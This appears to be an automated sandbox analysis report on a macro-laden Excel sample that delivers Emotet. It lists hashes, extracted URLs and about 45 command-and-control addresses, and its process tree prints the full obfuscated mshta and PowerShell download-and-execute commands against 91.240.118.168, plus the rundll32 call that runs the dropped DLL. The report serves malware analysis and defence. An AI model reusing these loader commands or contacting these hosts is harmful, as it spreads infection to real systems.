Analysis
-
max time kernel
60s -
max time network
50s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
28-01-2022 01:01
Behavioral task
behavioral1
Sample
2022-1-28-a1465b9e27030fa71b863fcbbe264405.xls
Resource
win7-en-20211208
General
-
Target
2022-1-28-a1465b9e27030fa71b863fcbbe264405.xls
-
Size
46KB
-
MD5
a1465b9e27030fa71b863fcbbe264405
-
SHA1
072615acb803b2f602222ba683b72ece4b1c5fec
-
SHA256
0aeb1fed2a92309d35b4c1ee2f5a18ad9594fd5382f4ab9fe6fa431e9a426548
-
SHA512
697e729b34013c3fc8956e9c8bb9e5799df007666f4bf288a878f35d3a4be597d51f71616096b2b363fa3a397a8a2662d1231403acedbdcfa88a2a0032c1edc6
Malware Config
Extracted
http://91.240.118.168/vvv/ppp/fe.html
Extracted
http://91.240.118.168/vvv/ppp/fe.png
Extracted
emotet
Epoch4
51.15.4.22:443
173.214.173.220:8080
212.237.5.209:443
192.254.71.210:443
216.158.226.206:443
162.243.175.63:443
212.24.98.99:8080
58.227.42.236:80
45.118.115.99:8080
104.251.214.46:8080
185.157.82.209:8080
46.55.222.11:443
188.40.137.206:8080
81.0.236.90:443
103.75.201.2:443
129.232.188.93:443
195.154.133.20:443
159.8.59.82:8080
79.172.212.216:8080
138.185.72.26:8080
200.17.134.35:7080
185.157.82.211:8080
209.59.138.75:7080
178.63.25.185:443
45.176.232.124:443
45.118.135.203:7080
164.68.99.3:8080
203.114.109.124:443
212.237.17.99:8080
50.116.54.215:443
131.100.24.231:80
212.237.56.116:7080
45.142.114.231:8080
162.214.50.39:7080
51.38.71.0:443
104.168.155.129:8080
107.182.225.142:8080
217.182.143.207:443
158.69.222.101:443
176.104.106.96:8080
207.38.84.195:8080
41.76.108.46:8080
110.232.117.186:8080
178.79.147.66:8080
173.212.193.249:8080
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
CMD.EXEdescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 2072 3972 CMD.EXE EXCEL.EXE -
Blocklisted process makes network request 3 IoCs
Processes:
mshta.exepowershell.exeflow pid process 41 3924 mshta.exe 43 2376 powershell.exe 45 2376 powershell.exe -
Downloads MZ/PE file
-
Loads dropped DLL 2 IoCs
Processes:
rundll32.exerundll32.exepid process 1896 rundll32.exe 3876 rundll32.exe -
Drops file in System32 directory 1 IoCs
Processes:
rundll32.exedescription ioc process File opened for modification C:\Windows\SysWOW64\Lyupkftsqjvs\ggwxblau.exv rundll32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 988 3924 WerFault.exe mshta.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 3972 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 19 IoCs
Processes:
powershell.exeWerFault.exerundll32.exepid process 2376 powershell.exe 2376 powershell.exe 2376 powershell.exe 988 WerFault.exe 988 WerFault.exe 988 WerFault.exe 988 WerFault.exe 988 WerFault.exe 988 WerFault.exe 988 WerFault.exe 988 WerFault.exe 988 WerFault.exe 988 WerFault.exe 988 WerFault.exe 988 WerFault.exe 988 WerFault.exe 988 WerFault.exe 1048 rundll32.exe 1048 rundll32.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exeWerFault.exedescription pid process Token: SeDebugPrivilege 2376 powershell.exe Token: SeDebugPrivilege 988 WerFault.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
Processes:
EXCEL.EXEpid process 3972 EXCEL.EXE 3972 EXCEL.EXE 3972 EXCEL.EXE 3972 EXCEL.EXE 3972 EXCEL.EXE 3972 EXCEL.EXE 3972 EXCEL.EXE 3972 EXCEL.EXE 3972 EXCEL.EXE 3972 EXCEL.EXE 3972 EXCEL.EXE 3972 EXCEL.EXE -
Suspicious use of WriteProcessMemory 20 IoCs
Processes:
EXCEL.EXECMD.EXEmshta.exepowershell.execmd.exerundll32.exerundll32.exerundll32.exedescription pid process target process PID 3972 wrote to memory of 2072 3972 EXCEL.EXE CMD.EXE PID 3972 wrote to memory of 2072 3972 EXCEL.EXE CMD.EXE PID 2072 wrote to memory of 3924 2072 CMD.EXE mshta.exe PID 2072 wrote to memory of 3924 2072 CMD.EXE mshta.exe PID 3924 wrote to memory of 2376 3924 mshta.exe powershell.exe PID 3924 wrote to memory of 2376 3924 mshta.exe powershell.exe PID 2376 wrote to memory of 1400 2376 powershell.exe cmd.exe PID 2376 wrote to memory of 1400 2376 powershell.exe cmd.exe PID 1400 wrote to memory of 1896 1400 cmd.exe rundll32.exe PID 1400 wrote to memory of 1896 1400 cmd.exe rundll32.exe PID 1400 wrote to memory of 1896 1400 cmd.exe rundll32.exe PID 1896 wrote to memory of 3876 1896 rundll32.exe rundll32.exe PID 1896 wrote to memory of 3876 1896 rundll32.exe rundll32.exe PID 1896 wrote to memory of 3876 1896 rundll32.exe rundll32.exe PID 3876 wrote to memory of 740 3876 rundll32.exe rundll32.exe PID 3876 wrote to memory of 740 3876 rundll32.exe rundll32.exe PID 3876 wrote to memory of 740 3876 rundll32.exe rundll32.exe PID 740 wrote to memory of 1048 740 rundll32.exe rundll32.exe PID 740 wrote to memory of 1048 740 rundll32.exe rundll32.exe PID 740 wrote to memory of 1048 740 rundll32.exe rundll32.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\2022-1-28-a1465b9e27030fa71b863fcbbe264405.xls"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\CMD.EXECMD.EXE /c ms^hta http://91.2^40.118.1^68/vvv/ppp/f^e.ht^m^l2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\mshta.exemshta http://91.240.118.168/vvv/ppp/fe.html3⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/vvv/ppp/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll,BBDD5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWow64\rundll32.exeC:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll,BBDD6⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServer7⤵
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Lyupkftsqjvs\ggwxblau.exv",pWDVOZaNX8⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Lyupkftsqjvs\ggwxblau.exv",DllRegisterServer9⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3924 -s 22764⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\QWER.dllMD5
06626264eaac835fedf9da1123f8d390
SHA1a6ab8e057c18a48ee50c6ad7ae010d3b09e0c094
SHA256297842eba5121f4492061ace94399b77c18763e46cd3f70dee9e12fa9c0e213d
SHA5124af800b6497e58547bb1a2155f5b8ee5102c80265b1d43c19469e1470d5d57c6a302d13830b09ac0bae359f1bfab4dce9832e987982117c6feee61c9eaca0b33
-
\ProgramData\QWER.dllMD5
06626264eaac835fedf9da1123f8d390
SHA1a6ab8e057c18a48ee50c6ad7ae010d3b09e0c094
SHA256297842eba5121f4492061ace94399b77c18763e46cd3f70dee9e12fa9c0e213d
SHA5124af800b6497e58547bb1a2155f5b8ee5102c80265b1d43c19469e1470d5d57c6a302d13830b09ac0bae359f1bfab4dce9832e987982117c6feee61c9eaca0b33
-
\ProgramData\QWER.dllMD5
06626264eaac835fedf9da1123f8d390
SHA1a6ab8e057c18a48ee50c6ad7ae010d3b09e0c094
SHA256297842eba5121f4492061ace94399b77c18763e46cd3f70dee9e12fa9c0e213d
SHA5124af800b6497e58547bb1a2155f5b8ee5102c80265b1d43c19469e1470d5d57c6a302d13830b09ac0bae359f1bfab4dce9832e987982117c6feee61c9eaca0b33
-
memory/740-616-0x0000000002FD0000-0x0000000002FF5000-memory.dmpFilesize
148KB
-
memory/1048-620-0x00000000000A0000-0x00000000000C5000-memory.dmpFilesize
148KB
-
memory/1048-622-0x00000000002C0000-0x00000000002E5000-memory.dmpFilesize
148KB
-
memory/1896-599-0x0000000000BD0000-0x0000000000BF5000-memory.dmpFilesize
148KB
-
memory/2376-279-0x000002ABF0C70000-0x000002ABF0C92000-memory.dmpFilesize
136KB
-
memory/2376-289-0x000002ABF0CD3000-0x000002ABF0CD5000-memory.dmpFilesize
8KB
-
memory/2376-288-0x000002ABF0CD0000-0x000002ABF0CD2000-memory.dmpFilesize
8KB
-
memory/2376-300-0x000002ABF1600000-0x000002ABF163C000-memory.dmpFilesize
240KB
-
memory/2376-311-0x000002ABF16C0000-0x000002ABF1736000-memory.dmpFilesize
472KB
-
memory/2376-545-0x000002ABF0CD6000-0x000002ABF0CD8000-memory.dmpFilesize
8KB
-
memory/3876-606-0x0000000004C80000-0x0000000004CA5000-memory.dmpFilesize
148KB
-
memory/3876-611-0x0000000004E40000-0x0000000004E65000-memory.dmpFilesize
148KB
-
memory/3876-619-0x0000000005090000-0x00000000050B5000-memory.dmpFilesize
148KB
-
memory/3876-615-0x0000000004F00000-0x0000000004F25000-memory.dmpFilesize
148KB
-
memory/3876-603-0x0000000004780000-0x00000000047A5000-memory.dmpFilesize
148KB
-
memory/3876-613-0x0000000004EA0000-0x0000000004EC5000-memory.dmpFilesize
148KB
-
memory/3876-609-0x0000000004D60000-0x0000000004D85000-memory.dmpFilesize
148KB
-
memory/3972-129-0x00007FFE8D940000-0x00007FFE8D950000-memory.dmpFilesize
64KB
-
memory/3972-115-0x00007FFE91410000-0x00007FFE91420000-memory.dmpFilesize
64KB
-
memory/3972-119-0x00007FFE91410000-0x00007FFE91420000-memory.dmpFilesize
64KB
-
memory/3972-118-0x00007FFE91410000-0x00007FFE91420000-memory.dmpFilesize
64KB
-
memory/3972-128-0x00007FFE8D940000-0x00007FFE8D950000-memory.dmpFilesize
64KB
-
memory/3972-117-0x00007FFE91410000-0x00007FFE91420000-memory.dmpFilesize
64KB
-
memory/3972-116-0x00007FFE91410000-0x00007FFE91420000-memory.dmpFilesize
64KB